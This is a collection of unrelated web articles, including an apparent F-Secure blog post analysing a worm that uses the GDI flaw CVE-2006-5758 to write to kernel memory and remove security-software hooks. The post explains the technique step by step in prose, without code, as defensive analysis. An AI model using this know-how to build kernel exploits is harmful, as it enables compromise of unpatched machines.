It is essential to carry out testing to ensure that everything is working according to the specifications and expectations for the solution. Testing should follow a proper methodology and should assess both functionality and features, with the results recorded. Any issues encountered during testing should be addressed with the vendors and rectified before proceeding to the pilot.
As mentioned earlier, the pilot is important to this phase and should be conducted once functional and feature tests are completed. The pilot tests for performance, resiliency, user experience, and interoperability, and addresses any issues that may have been overlooked during the initial phases. The pilot phase should also span across locations, departments, technologies, and resources. This reach ensures that all stakeholders are involved in the process and will work towards a proper resolution of any challenges faced.
Monitoring: This step receives very little attention in most enterprises. Monitoring is key to safeguarding the network from intruders and ensuring that systems and networks are performing as per specifications. It marks the culmination of the whole segmentation strategy and is the glue that brings people, processes, and technologies together to preserve the integrity of the protected resources. Keeping a close eye on the network not only eases detection of any anomalous activity but also helps identify any resources, new or existing, that may have been missed during the initial pass. This will determine whether another iteration through the whole segmentation lifecycle is required.
By 2020, the number of connected devices is expected to grow exponentially to 50 billion. As more devices connect to the digital world, segmenting an organization's infrastructure based on network elements will not be enough. Organizations are experiencing increased threats against their sensitive resources, which often results in a data breach. By using a framework that allows organizations to deconstruct all elements of a session request, inspect appropriate objects, and apply an access-control model to ensure that data is accessed by an authorized session (by a user, device, process, or application), organizations can help protect against these breaches. The framework provides senior management and network architects with a blueprint to ensure that segmentation is an indispensable part of the overall security strategy. The framework also offers a segmentation implementation strategy that provides all the means and tools to ensure that an organization's critical resources and data are well-protected.
Jazib Frahim (firstname.lastname@example.org)
Aun Raza (email@example.com)
The mainframe faced two crucial challenges during this period: 1) the cost of mainframe computing power (MIPS) was under pressure from distributed computing; 2) the monolithic application model was being replaced by n-tier client/server computing. Mainframes responded to the former with the introduction of CMOS technology and substantially cheaper MIPS. For the second challenge, the mainframe, with its twenty-plus years of development, housed critical business logic and data, and became the key source of the information that end users wanted to access. Organizations created application structures that resulted in their customers engaging with the mainframe, even though they likely did not recognize they were doing so.
IT attention had to shift to the end user and to managing quality of service, and BMC pioneered new systems management techniques, along with improvements to its solutions, that resulted in even greater mainframe availability.
BMC Innovations that Changed Mainframe Management (1990 – 2000)
(Watch this blog in coming weeks for reminiscences about these innovations.)
1999 – MainView Explorer delivered browser-based real-time monitoring of mainframe performance without the need for outboard hardware implementations
1999 – APPLY PLUS for DB2(R) offered an extremely fast STATIC SQL processor as an alternative to free DYNAMIC versions
1998 – Recover Plus for DB2 (Recover Backout) was the first alternative way (using backouts) to recover from DB2 database errors
1998 – Fast Path Online Reorg & Image Copy provided a faster method for reorganizing IMS(R) DEDB databases while the data is still online
1997 – Reorg Plus for DB2 SHLEVEL CHANGE allowed full update capability to a tablespace during 99% of the REORG process, eliminating the need for an application outage
1995 – DATA ACCELERATOR Compression compressed data to improve performance of applications using the data
1994 – APPLICATION RESTART CONTROL for DB2 and IMS automatically managed batch job failures and restarts
1993 – XBM (Snapshot Upgrade Facility) was the first product to take advantage of software caching and intelligent hardware to reduce the COPY time and outages
1992 – Change Manager for DB2 automated and simplified schema management for DB2
1992 – ULTRAOPT reduced loading on networks to improve performance without having to add network bandwidth
1991 – Recover PLUS for DB2 offered a faster time to recover from DB2 database errors
1991 – LoadPlus/UnloadPlus for DB2(R) provided a faster method for loading/unloading DB2 tables
1990 – RECOVERY PLUS for IMS(R) delivered a faster time to recover from IMS database errors
You can also view a fifty-year timeline and more information on our mainframe anniversary page at www.bmc.com/mainframeanniversary
(R) Trademarks or registered trademarks of International Business Machines Corporation in the United States, in other countries, or both. | <urn:uuid:d4701e3d-6142-46fd-a7a4-340a94a9d628> | CC-MAIN-2017-04 | http://www.bmc.com/blogs/50-bmc-mainframe-innovations-system390r-period-1990-2000/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00214-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.90046 | 607 | 2.671875 | 3 |
It's an interesting twist on an old tactic — a worm that uses a local elevation of privilege vulnerability to access the kernel and execute code.
Most malware with rootkit functionality will tamper with the Windows kernel and attempt to execute code in kernel mode. Typically, a special driver is used to do this.
Worm.Win32.AutoRun.nox has a payload that restores the original function pointers in the kernel's System Service Table (SST). The usual motivation for malware to do this is to remove any SST hooks installed by security software or other malware that might affect its successful operation.
As noted, normally a special driver or the physical memory device is used to get access to kernel-mode memory to restore the pointers. AutoRun.nox is different — it uses the "GDI Local Elevation of Privilege Vulnerability (CVE-2006-5758)" to do the job. For malware, it's rather unusual to see such a technique being used.
This vulnerability is due to an error in handling a shared memory structure, which allows the structure to be remapped from read-only to writable. April 2007's update patched the vulnerability.
After remapping the memory, the malware will initialize a CPalette object. It will then search for the palette object in the shared kernel memory structure. Since the memory is now writable, it can be altered to include a pointer to a special function that will remove any existing SST hooks. Finally, a call to GetNearestPaletteIndex will indirectly cause the function to be executed. Afterwards, the palette object is restored leaving no trace of the attack.
If attacking this vulnerability fails, the worm goes back to the tried-and-true "special driver" method. The driver is detected by us as Rootkit:W32/Agent.UG.
Either way, if the attack is successful, the machine is compromised as the attacker can access the kernel and execute code, or cause a denial of service.
This attack will only work on unpatched machines running without the latest updates. Microsoft ranks this vulnerability as Important and recommends that users apply the update immediately. | <urn:uuid:42ce9852-b40b-4b73-a37d-0a2a71734e09> | CC-MAIN-2017-04 | https://www.f-secure.com/weblog/archives/00001507.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280128.70/warc/CC-MAIN-20170116095120-00518-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.884211 | 437 | 2.59375 | 3 |
Tyack P.L., Woods Hole Oceanographic Institution
Zimmer W.M.X., North Atlantic Treaty Organisation Undersea Research Center
Moretti D., Naval Undersea Warfare Center
Southall B.L., Southall Environmental Associates
And 11 more authors.
PLoS ONE | Year: 2011
Beaked whales have mass stranded during some naval sonar exercises, but the cause is unknown. They are difficult to sight but can reliably be detected by listening for echolocation clicks produced during deep foraging dives. Listening for these clicks, we documented Blainville's beaked whales, Mesoplodon densirostris, in a naval underwater range where sonars are in regular use near Andros Island, Bahamas. An array of bottom-mounted hydrophones can detect beaked whales when they click anywhere within the range. We used two complementary methods to investigate behavioral responses of beaked whales to sonar: an opportunistic approach that monitored whale responses to multi-day naval exercises involving tactical mid-frequency sonars, and an experimental approach using playbacks of simulated sonar and control sounds to whales tagged with a device that records sound, movement, and orientation. Here we show that in both exposure conditions beaked whales stopped echolocating during deep foraging dives and moved away. During actual sonar exercises, beaked whales were primarily detected near the periphery of the range, on average 16 km away from the sonar transmissions. Once the exercise stopped, beaked whales gradually filled in the center of the range over 2-3 days. A satellite-tagged whale moved outside the range during an exercise, returning over 2-3 days post-exercise. The experimental approach used tags to measure acoustic exposure and behavioral reactions of beaked whales to one controlled exposure each of simulated military sonar, killer whale calls, and band-limited noise. The beaked whales reacted to these three sound playbacks at sound pressure levels below 142 dB re 1 μPa by stopping echolocation followed by unusually long and slow ascents from their foraging dives. The combined results indicate similar disruption of foraging behavior and avoidance by beaked whales in the two different contexts, at exposures well below those used by regulators to define disturbance.
Schick R.S., Duke University
Halpin P.N., Duke University
Read A.J., Duke University
Urban D.L., Duke University
And 11 more authors.
Marine Ecology Progress Series | Year: 2011
The understanding of a species' niche is fundamental to the concept of ecology, yet relatively little work has been done on niches in pelagic marine mammal communities. Data collection on the distribution and abundance of marine mammals is costly, time consuming and complicated by logistical difficulties. Here we take advantage of a data archive comprising many different datasets on the distribution and abundance of cetaceans from Nova Scotia through the Gulf of Mexico in an effort to uncover community structure at large spatial scales (1000s of km). We constructed a multivariate ordination of the species data, tested for group structure that might exist within the ordination space, and determined how these groups might differ in environmental space. We examined 3 biogeographic regions: the oceanic waters north and south of Cape Hatteras, NC, and the Gulf of Mexico. North of Hatteras, we found 2 main groups split along a temperature and chlorophyll gradient, with most piscivores being found in cooler, more productive waters of the continental shelf, and most teuthivores being found farther offshore in warmer, less productive waters at the shelf break (200 m isobath). South of Hatteras, we found 3 groups, with the largest group being in warmer, lower chlorophyll waters that are closest to shore. In the Gulf of Mexico, we found 7 groups arrayed along a bottom depth gradient. We also tested the effect of taxonomically lumping different beaked whale species on ordination results. Results showed that when beaked whales were identified to the species level, they clustered out into distinct niches that are separate from those of other Odontocete groups. These results add to an increasing understanding of wildlife habitat associations and niche partitioning in the community structure of pelagic species, and provide important baseline information for future population monitoring efforts. © Inter-Research 2011.
Deruiter S.L., University of St. Andrews
Boyd I.L., University of St. Andrews
Claridge D.E., Bahamas Marine Mammal Research Organisation
Clark C.W., Cornell Laboratory of Ornithology
And 3 more authors.
Marine Mammal Science | Year: 2013
In 2007 and 2008, controlled exposure experiments were performed in the Bahamas to study behavioral responses to simulated mid-frequency active sonar (MFA) by three groups of odontocetes: false killer whales, Pseudorca crassidens; short-finned pilot whales, Globicephala macrorhynchus; and melon-headed whales, Peponocephala electra. An individual in each group was tagged with a Dtag to record acoustic and movement data. During exposures, some individuals produced whistles that seemed similar to the experimental MFA stimulus. Statistical tests were thus applied to investigate whistle-MFA similarity and the relationship between whistle production rate and MFA reception time. For the false killer whale group, overall whistle rate and production rate of the most MFA-like whistles decreased with time since last MFA reception. Despite quite low whistle rates overall by the melon-headed whales, statistical results indicated minor transient silencing after each signal reception. There were no apparent relationships between pilot whale whistle rates and MFA sounds within the exposure period. This variability of responses suggests that changes in whistle production in response to acoustic stimuli depend not only on species and sound source, but also on the social, behavioral, or environmental contexts of exposure. © 2012 by the Society for Marine Mammalogy.
Fearnbach H., University of Aberdeen
Fearnbach H., Bahamas Marine Mammal Research Organisation
Durban J., Southwest Fisheries Science Center
Durban J., Bahamas Marine Mammal Research Organisation
And 5 more authors.
Ecological Applications | Year: 2012
Identifying demographic changes is important for understanding population dynamics. However, this requires long-term studies of definable populations of distinct individuals, which can be particularly challenging when studying mobile cetaceans in the marine environment. We collected photo-identification data from 19 years (1992-2010) to assess the dynamics of a population of bottlenose dolphins (Tursiops truncatus) restricted to the shallow (<7 m) waters of Little Bahama Bank, northern Bahamas. This population was known to range beyond our study area, so we adopted a Bayesian mixture modeling approach to mark-recapture to identify clusters of individuals that used the area to different extents, and we specifically estimated trends in survival, recruitment, and abundance of a "resident" population with high probabilities of identification. There was a high probability (p = 0.97) of a long-term decrease in the size of this resident population from a maximum of 47 dolphins (95% highest posterior density intervals, HPDI = 29-61) in 1996 to a minimum of just 24 dolphins (95% HPDI = 14-37) in 2009, a decline of 49% (95% HPDI = -5% to -75%). This was driven by low per capita recruitment (average ∼0.02) that could not compensate for relatively low apparent survival rates (average ∼0.94). Notably, there was a significant increase in apparent mortality (∼5 apparent mortalities vs. ∼2 on average) in 1999 when two intense hurricanes passed over the study area, with a high probability (p = 0.83) of a drop below the average survival probability (∼0.91 in 1999; ∼0.94, on average). As such, our mark-recapture approach enabled us to make useful inference about local dynamics within an open population of bottlenose dolphins; this should be applicable to other studies challenged by sampling highly mobile individuals with heterogeneous space use. © 2012 by the Ecological Society of America.
Dunn C., Bahamas Marine Mammal Research Organisation
Claridge D., Bahamas Marine Mammal Research Organisation
Journal of the Marine Biological Association of the United Kingdom | Year: 2014
Killer whales (Orcinus orca) have a cosmopolitan distribution, yet little is known about populations that inhabit tropical waters. We compiled 34 sightings of killer whales in the Bahamas, recorded from 1913 to 2011. Group sizes were generally small (mean = 4.2, range = 1-12, SD = 2.6). Thirteen sightings were documented with photographs and/or video of sufficient quality to allow individual photo-identification analysis. Of the 45 whales photographed, 14 unique individual killer whales were identified, eight of which were re-sighted between two and nine times. An adult female (Oo6) and a now-adult male (Oo4) were first seen together in 1995, and have been re-sighted together eight times over a 16-yr period. To date, killer whales in the Bahamas have only been observed preying on marine mammals, including Atlantic spotted dolphin (Stenella frontalis), Fraser's dolphin (Lagenodelphis hosei), pygmy sperm whale (Kogia breviceps) and dwarf sperm whale (Kogia sima), all of which are previously unrecorded prey species for Orcinus orca. © 2013 Marine Biological Association of the United Kingdom.
As more and more people around the world rely heavily on the Web as a primary source of information, governments are taking note – and stepping up efforts to censor the Internet. From July to December 2012, Google received 2,285 government requests to remove 24,179 pieces of content—an increase of 26 percent over the 1,811 requests to remove 18,070 pieces of content that we received during the first half of 2012.
Those numbers are part of Google's seventh and most recent transparency report, a commendable effort to tell the world what information governments around the world are requesting or, in this case, trying to delete.
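As a quick sanity check (an illustrative calculation, not part of the report), the growth rates quoted above follow directly from the raw counts:

```python
# Figures quoted above from Google's transparency report.
requests_h1, requests_h2 = 1811, 2285   # removal requests, Jan-Jun vs Jul-Dec 2012
items_h1, items_h2 = 18070, 24179       # pieces of content targeted

request_growth = (requests_h2 - requests_h1) / requests_h1
item_growth = (items_h2 - items_h1) / items_h1

print(f"requests up {request_growth:.0%}, targeted items up {item_growth:.0%}")
```

The request count grew about 26 percent, while the number of targeted items grew faster, about 34 percent, meaning each request covered more content on average.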
It's not the dictatorships or Islamic governments that are trying the hardest to censor information; it's the democracies. Brazil made the most requests of any country, with 697, while the United States took second place with 321.
According to Google Legal Director Susan Infantino, the Brazilian municipal elections caused the spike in censorship, with half of the total requests alleging violations of that country's electoral code, which forbids defamation against candidates.
Defamation is a very slippery sort of word, and it's easy enough to use it as an excuse to tamp down legitimate criticisms of public officials. In the U.S., said Infantino, "We received a request from a local government agency to remove a YouTube video that allegedly defamed a school administrator. We did not remove the video.
"We received three separate requests from local law enforcement agencies to remove three YouTube videos that allegedly defamed police officers, public prosecutors or contained information about police investigations. We did not remove the videos."
Since 2010, more than one-third of its content removal requests were over reported defamation, by far the largest category of removal request, the company reported, while pornography, national security and copyright violation accounted for a small fraction of the take-down requests.
Twitter started reporting government takedown requests last year, but Facebook still does not.
The transparency reports also focus on government attempts to grab information on users from Google. In January, Google disclosed that government agencies in the U.S. made a record number of requests for user data in the last half of 2012 -- but only 22 percent were backed up by a warrant. | <urn:uuid:0d209740-6ce6-4f28-b904-e2c82572280b> | CC-MAIN-2017-04 | http://www.cio.com/article/2370518/internet/google-reports-web-censorship-is-escalating.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00040-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958015 | 457 | 2.65625 | 3 |
Microsoft researchers have developed the prototype of a client-side architecture that would replace the Web browser with a much more secure virtualized environment that isolates Web applications.
Called Embassies, the technology would have applications run in low-level, native-code containers that would use Internet addresses for all external communications with applications. The architecture is based on the notion of a "pico-datacenter," a client-side version of a shared server datacenter.
"Since the datacenter model is designed to be robust to malicious tenants, it is never dangerous for the user to click a link and invite a possibly hostile party onto the client," Microsoft researchers said in a paper presented this month at the USENIX Symposium on Networked System Design and Implementation.
The problem Microsoft is trying to solve is the insecurity of today's browsers, brought on by their complexity. In the 1990s, when browsers were introduced, the software was mostly responsible for formatting Web pages that were text, links and simple graphics.
Today's browsers have many more application programming interfaces (APIs) that are used for far more complicated tasks, such as video, animation and 3D graphics. This high level of complexity has brought a never-ending string of vulnerabilities that hackers can exploit.
"I think [Embassies is] an interesting idea and shows enough promise to be worth additional investigation and investment," Jason Taylor, chief technology officer of Security Innovation, said on Friday. "The premise of strong isolation for each Web application versus isolation for the browser itself is intriguing."
Embassies is Microsoft's attempt to present a simpler alternative than the browser. The architecture would provide a simple execution environment that would use only 30 functions in interacting with the client's execution interface (CEI). Displaying content would essentially be a screencast from the container to the user's screen.
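To make the contrast with today's sprawling browser APIs concrete, the sketch below illustrates the idea of a deliberately tiny client execution interface. It is a loose illustration in Python, not the actual CEI: the real interface is native and low level, and the call names here are invented.

```python
class MinimalCEI:
    """Toy model of a minimal client execution interface (CEI).

    Applications can only reach the outside world through a small,
    fixed set of calls, instead of hundreds of rich browser APIs.
    """
    # Invented names; the paper's real interface has roughly 30 low-level calls.
    ALLOWED = {"net_send", "net_recv", "blit_frame", "alloc", "free"}

    def call(self, name, *args):
        if name not in self.ALLOWED:
            raise PermissionError(f"CEI exposes no such call: {name}")
        return ("ok", name, args)
```

Anything a Web application wants to do, including rendering, has to be expressed through the narrow interface, which is what keeps the container's attack surface small and auditable.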
The simplicity of the environment would require developers to do more than they do now in building applications for a browser, which provides lots of libraries through its APIs. With Embassies, developers would be responsible for packaging their own libraries with their applications, a difficult process that in effect would hand security responsibilities to the developer. If malicious code gets in, the container would theoretically prevent it from infecting the computer.
That approach has its skeptics. "The problem with the idea is that developers of web applications are often terrible at security and the idea that you are going to make them the ones responsible for the security instead of the web browser developer just seems like out of the frying pan and into the fire," said Peter Bybee, president and chief executive of Security On-Demand. "I think this is more about wishful thinking and less on realistic change."
Wolfgang Kandek, chief technology officer of Qualys, said the added responsibilities would likely overwhelm most developers, but he believed that the process of packaging libraries could eventually be automated within development tools.
"It is an architecture that will require lots of changes on the client side and on the developer side, which is probably why this is not something that will happen overnight," Kandek said.
Indeed, the authors of the paper, Microsoft researchers Jon Howell, Bryan Parno and John R. Douceur, acknowledged that Embassies would require dramatic changes in application development and adoption of the architecture would take years.
While Microsoft described the architecture as a browser replacement, the company also believed it could become a more secure alternative to desktop operating system apps. Shlomo Kramer, president and chief executive of Imperva, said Embassies was "promising in theory," but believed it would not scale to that level.
"The main reason is that it makes collaboration, workflows, sharing of data and transacting across virtual machines very cumbersome," Kramer said.
Matthew Neely, director of research at SecureState, said rather than replace today's browsers, security could be dramatically improved just by developers treating it as an integral part of the development process.
"A lot of people like to focus on new technology to fix something when really if you just apply the basics to what we have already, you can usually get more impact," Neely said.
This story, "Microsoft eyes ditching browser for secure Web apps" was originally published by CSO. | <urn:uuid:b0d95b39-3240-49ca-9fe4-d697429d9cfb> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2165341/smb/microsoft-eyes-ditching-browser-for-secure-web-apps.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280929.91/warc/CC-MAIN-20170116095120-00555-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965195 | 874 | 2.578125 | 3 |
What are the Sources of Risks?
According to a Harvard and Gartner “IT risk” research report, “Most IT risks arise not from technical or low-level people issues but from the failure of the enterprise’s oversight and governance processes for IT. Such failures produce a series of poor decisions and badly structured IT assets that are manifested as ineffective IT governance, uncontrolled complexity, and inattention to risk. Many of the risk factors are symptoms of common condition, ineffective implementation of IT governance.”
Risk and Return Relationship
Everyday decisions that managers make commit their organizations to different levels of risk for which they must seek appropriate rewards. Figure 1 (above) reflects the positive correlation between risk and return in four stages:
- The (X) axis represents the value over time, and the (Y) axis represents the investment size.
- When the risk curve is low and the return curve is at the safe-investment level, this frame is called “low return and low risk,” and the expectation from the IT project is “low value.”
- As the risk curve rises toward the mid-point, the return curve rises proportionally to reach the point of optimum investment; this frame is called “medium return and medium risk,” and the expectation from the IT project is “medium value.”
- When the risk reaches its high point, the return curve rises proportionally to reach the risky-investment level; this frame is called “high risk and high reward,” and the expectation from the project is “high value.”
- Finally, the two curves converge; at this point, the risk factors are too great in some or all parts and will destroy the value of the project.
Each accepted project will increase or decrease the overall risk of the organization by quantities that may appear insignificant in the larger context, but aggregate to determine the overall risk of the organization. Holistically, this drives the entire organization up or down the risk and reward curves.
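The shape of the curves can be illustrated numerically. The model below is hypothetical (invented for illustration, not taken from the article): potential reward grows with risk while the probability of success falls, so expected value rises, peaks at a moderate risk level, and then collapses as the curves converge.

```python
def expected_value(base_return: float, risk: float) -> float:
    """Hypothetical model: reward scales up with risk, success odds scale down."""
    reward = base_return * (1 + 2 * risk)   # higher risk, higher potential reward
    p_success = 1 - risk                    # higher risk, lower chance of success
    return reward * p_success

for risk in (0.1, 0.3, 0.5, 0.7, 0.9):
    print(f"risk={risk:.1f}  expected value={expected_value(100, risk):6.1f}")
```

With these invented parameters, expected value peaks at moderate risk and falls sharply as risk approaches the point where failure is almost certain, mirroring the four stages described above.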
IT needs to Align with the Organization’s Risk Portfolio
Effective implementation of enterprise IT projects requires alignment of IT management decisions with the organization's business strategy and risk governance. Overall, governance achieves three goals: effective use of IT by people, IT decisions properly processed among the various IT departments, and structured tracking and reporting of projects. IT governance determines what decisions must be made based on the organization's appetite for risk, who should make those decisions (which provides checks and balances), and, finally, how those decisions are made.
Turn Risk into Competitive Advantage
An IT risk incident has the potential to produce substantial business consequences that touch a wide range of stakeholders. Once an organization starts to invest wisely in IT, it will turn IT into a competitive-advantage weapon, but equally, it will grow its dependency on IT. As a result, IT becomes part of the organization's fabric of business risk. Therefore, when IT executives make decisions, they need to understand the organization's risk portfolio and its appetite for risk. In short, IT risk matters now more than ever.
Please note the opinions expressed here are those of the author and do not reflect those of his employer.
Industry Perspectives is a content channel at Data Center Knowledge highlighting thought leadership in the data center arena. See our guidelines and submission process for information on participating. View previously published Industry Perspectives in our Knowledge Library.
1 Harvard Business School, Turning Business Threat Into Competitive Advantage 2007.
(Optional) The name and value of environment variables
The <env> element specifies the name and value of environment variables. For example, you can use the LD_LIBRARY_PATH environment variable to tell the OS's dynamic linker where to find shared libraries required by the application. In addition, you can use custom environment variables where the use of program arguments isn't possible.
For instance, you can set LD_LIBRARY_PATH to a value of app/playbook/native/lib to specify where to find the required binaries.
| Attribute | Description | Valid values | Default |
| --- | --- | --- | --- |
| value | (Required) Specifies the value for the environment variable, such as app/playbook/native/lib. | A string that uniquely identifies the value within the application descriptor file. The string must contain only digits, letters, white space, and underscores, and must begin with a letter or underscore. | None |
| var | (Required) Specifies the name of the environment variable, such as LD_LIBRARY_PATH. | A string that uniquely identifies the variable within the application descriptor file. The string must contain only digits, letters, and underscores, and must begin with a letter or underscore. | None |
<env var="LD_LIBRARY_PATH" value="app/playbook/native/lib"/> | <urn:uuid:369789cb-2143-443f-b06f-2e2f947a5c2e> | CC-MAIN-2017-04 | http://developer.blackberry.com/playbook/native/documentation/com.qnx.doc.native_sdk.devguide/com.qnx.doc.native_sdk.devguide/topic/r_barfile_dtd_ref_env.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00005-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.697771 | 278 | 2.71875 | 3 |
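For context, a fuller bar-descriptor.xml fragment might place the element alongside other top-level elements as follows. This is a hypothetical sketch: the application id, name, and the custom MYAPP_LOG_LEVEL variable are placeholders, not taken from this page.

```xml
<qnx xmlns="http://www.qnx.com/schemas/application/1.0">
    <id>com.example.myapp</id>
    <name>My App</name>

    <!-- Point the dynamic linker at the shared libraries bundled with the app -->
    <env var="LD_LIBRARY_PATH" value="app/playbook/native/lib"/>

    <!-- Custom variable read by the application at runtime -->
    <env var="MYAPP_LOG_LEVEL" value="debug"/>
</qnx>
```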
You ever see a woman walking around on incredibly tall and pointy high heels and say to yourself, "That actually looks dangerous!"
Well, it is. And high heel-related injuries are on the rise.
From HealthDay via CBS News:
U.S. emergency rooms treated 123,355 high-heel-related injuries between 2002 and 2012, say researchers from the University of Alabama at Birmingham. More than 19,000 of those injuries occurred in 2011 alone.
Sprains and strains to the foot and ankle were the most common complaints, and most patients were in their 20s and 30s, the study found.
The study was published last month in The Journal of Foot and Ankle Surgery. From a university press release:
The vast majority of the injuries — more than 80 percent — were to the ankle or foot, with just under 20 percent involving the knee, trunk, shoulder, or head and neck. More than half were strains or sprains, with fractures accounting for 19 percent of all injuries. While white females as a group had the largest number of heel-related injuries, the rate of injury for black females was twice that of whites.
“Our findings also suggest that high-heel-related injuries have increased over time, with the rate of injury nearly doubling from 2002 to 2012,” said lead researcher Gerald McGwin, Ph.D., vice chair and professor of the Department of Epidemiology in the UAB School of Public Health. "We also noted that nearly half the injuries occurred in the home, which really supports the idea of wearing the right footwear for the right occasion and setting. Also, to reduce the time of exposure, we recommend that those wearing heels be aware of how often and for how long they wear them.”
Is it just us, or is it sort of strange that women wear high heels so frequently at home? We don't get that.
This story, "The dangers of high heels are quite real" was originally published by Fritterati. | <urn:uuid:86d0d21c-7416-487a-920c-5dcf9600ab60> | CC-MAIN-2017-04 | http://www.itnews.com/article/2932952/the-dangers-of-high-heels-are-quite-real.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00399-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.980078 | 415 | 2.53125 | 3 |
Computer technology has progressed at a fast pace over the last 10 years. Technological advancements have brought the price of powerful portable computers easily within the reach of most budgets. The notebook computer used to write this article has more computing power than the computers that helped put the first man on the moon. According to a recent survey, 37 percent of all homes in the United States now have a computer, and law enforcement agencies are rapidly becoming computerized as well.
In the past, law enforcement agencies were slow to use technology. This was primarily due to limited government budgets and the lack of a clear-cut need to make changes to existing manual systems. Now, many law enforcement agencies have computerized, and the rest are rapidly moving in that direction. Notebook computers have found their way into squad cars and have proven a great tool for writing reports. Computers are also valuable tools in the cataloging of evidence found at crime scenes and raid sites. They also make easy work of managing law enforcement evidence rooms. In some departments, computers are used to facilitate communications via e-mail, and the most progressive law enforcement agencies have created Internet Web sites to promote public relations. This is not yet the norm, and many law enforcement executives are considering for the first time how the Internet might be used by their agencies.
E-mail and other Internet features can certainly maximize the efficiency of law enforcement agencies. But some departments are hung up on whether or not potential problems outweigh potential benefits. After all, the Internet was never intended to be secure, and the perception remains that a lowlife or pervert is hiding under every "cyber rock."
True, caution should not be thrown to the wind. As with anything else that is new, proper planning and research are essential for success.
With the possible exception of an agencywide computer network, Internet e-mail is the fastest, easiest and most cost-effective means of sharing law enforcement communications. The click of a mouse can broadcast e-mail messages to one or more individuals within an agency, or even to individuals in other law enforcement agencies. If the information is sensitive, it doesn't take much extra effort to encrypt the sensitive information and attach it to an e-mail message. As long as the recipient of the message knows the password and has the ability to receive e-mail attachments, a high degree of law enforcement security can be maintained.
File encryption has proven a mixed blessing for law enforcement agencies over the last several years. In some cases, the crooks have used encryption to block law enforcement access to their communications and computer files. As a result, dealing with encrypted files has become a serious cause of hair pulling by law enforcement computer specialists. However, not everything about encryption is bad. The same technology can be used by law enforcement agencies to keep law enforcement secrets away from the criminal element. It has worked well for the military and corporations. It should work just as well for law enforcement agencies.
Military-strength file encryption software is available for government and corporate computer users from a variety of commercial sources. With e-mail attachments, the recipient doesn't even have to have a copy of the encryption program, because the sender can send the encrypted attachment as a small program run by the recipient. The only thing needed to decipher the attachment is the correct password and the ability of the recipient to receive binary attachments via e-mail. By using Internet e-mail in this fashion, law enforcement officials can easily and securely communicate using state-of-the-art technology.
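As a toy illustration only of the workflow the article describes (derive a key from a shared password, encrypt the attachment, and let the recipient decrypt with the same password), the sketch below uses a hand-rolled construction from Python's standard library. It is not a real cipher: an agency would use vetted software (PGP or an AES-based tool), and every function name here is invented for the example.

```python
import hashlib
import hmac
import os

def _keystream(key: bytes, length: int) -> bytes:
    # Expand the key into a pseudo-random keystream (toy construction,
    # NOT cryptographically sound -- for illustration only).
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def encrypt_attachment(password: str, plaintext: bytes) -> bytes:
    """Encrypt a file under a password the recipient also knows."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, len(plaintext))))
    tag = hmac.new(key, salt + ct, hashlib.sha256).digest()  # integrity check
    return salt + tag + ct

def decrypt_attachment(password: str, blob: bytes) -> bytes:
    """Recover the file; fails if the password is wrong or data was altered."""
    salt, tag, ct = blob[:16], blob[16:48], blob[48:]
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    expected = hmac.new(key, salt + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("wrong password or corrupted attachment")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, len(ct))))
```

The key point for law enforcement use is the last step: the recipient needs nothing but the password and the ability to receive a binary attachment.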
Cops On The Web
Web pages are starting to become more popular in law enforcement circles. They can be used to share crime prevention information and other law enforcement communications with the public. Furthermore, the mere existence of a simple law enforcement Web site sends a clear signal to the public that the agency is modern and technologically aware. Most law enforcement computer evidence specialists have the necessary tools to create Web pages, and the cost of maintaining a site is just a few dollars a month. Some Internet service providers (ISPs) even provide free Web space as part of their services for e-mail clients. Cost should no longer be an issue for law enforcement agencies, and the time is right.
ISP or AOL?
Before intelligent decisions can be made regarding the merits of using law enforcement e-mail and Internet public relations, some areas of confusion need to be clarified. Many computer users don't fully understand the differences between ISPs and online computer services such as CompuServe and America Online. The differences are quite distinct, and each option has advantages and disadvantages.
An ISP essentially provides a connection or link to the Internet. The computer user normally connects to the ISP using a modem over a local or toll-free phone line. Some of these providers are small, one-man businesses that may or may not have good physical security at their computer sites. Some operate without any reliable level of computer security and leave security issues up to the user. However, ISPs usually offer the best price and, in some cities can even be obtained free of charge.
A security tour of the ISP's computer facility is normally the recommended first step for a law enforcement agency. If the facility doubles as the headquarters for the local thugs, it might be wise to move on to the next provider. But again, most Internet security concerns can be eliminated through the use of rock-solid file encryption. Many times a local ISP will also make a Web site available free of charge to law enforcement agencies that have purchased e-mail services. Such Web pages are easily created by using any one of the popular word processing programs that have HTML export capabilities. More sophisticated programs are available for under $100.
Online services are essentially huge computer networks of diverse computer users. These networks are self-contained, but also provide Internet connectivity. As with ISPs, these services are also accessed by computer users through the use of modems connected to local or toll-free, long-distance telephone lines. However, because of the nature of these large networks, there is a substantial security layer between the end user and the Internet. Online services are owned and managed by huge corporations that are security-oriented. This can be a real plus if physical security of the computer network is a concern.
Online service companies like CompuServe and America Online can be compared with television cable service providers. Cable companies provide direct access to local television channels as well as their own special channels and featured promotions like HBO and Showtime. In a similar fashion, online services give you access to the Internet along with specialized forums and other member services. Law enforcement forums on CompuServe include the Police Forum, Safetynet Forum and the Time Warner Crime Forum, to mention just a few. However, just like a cable service, add-ons can run up the cost, depending on the forum involved and the duration of access time involved.
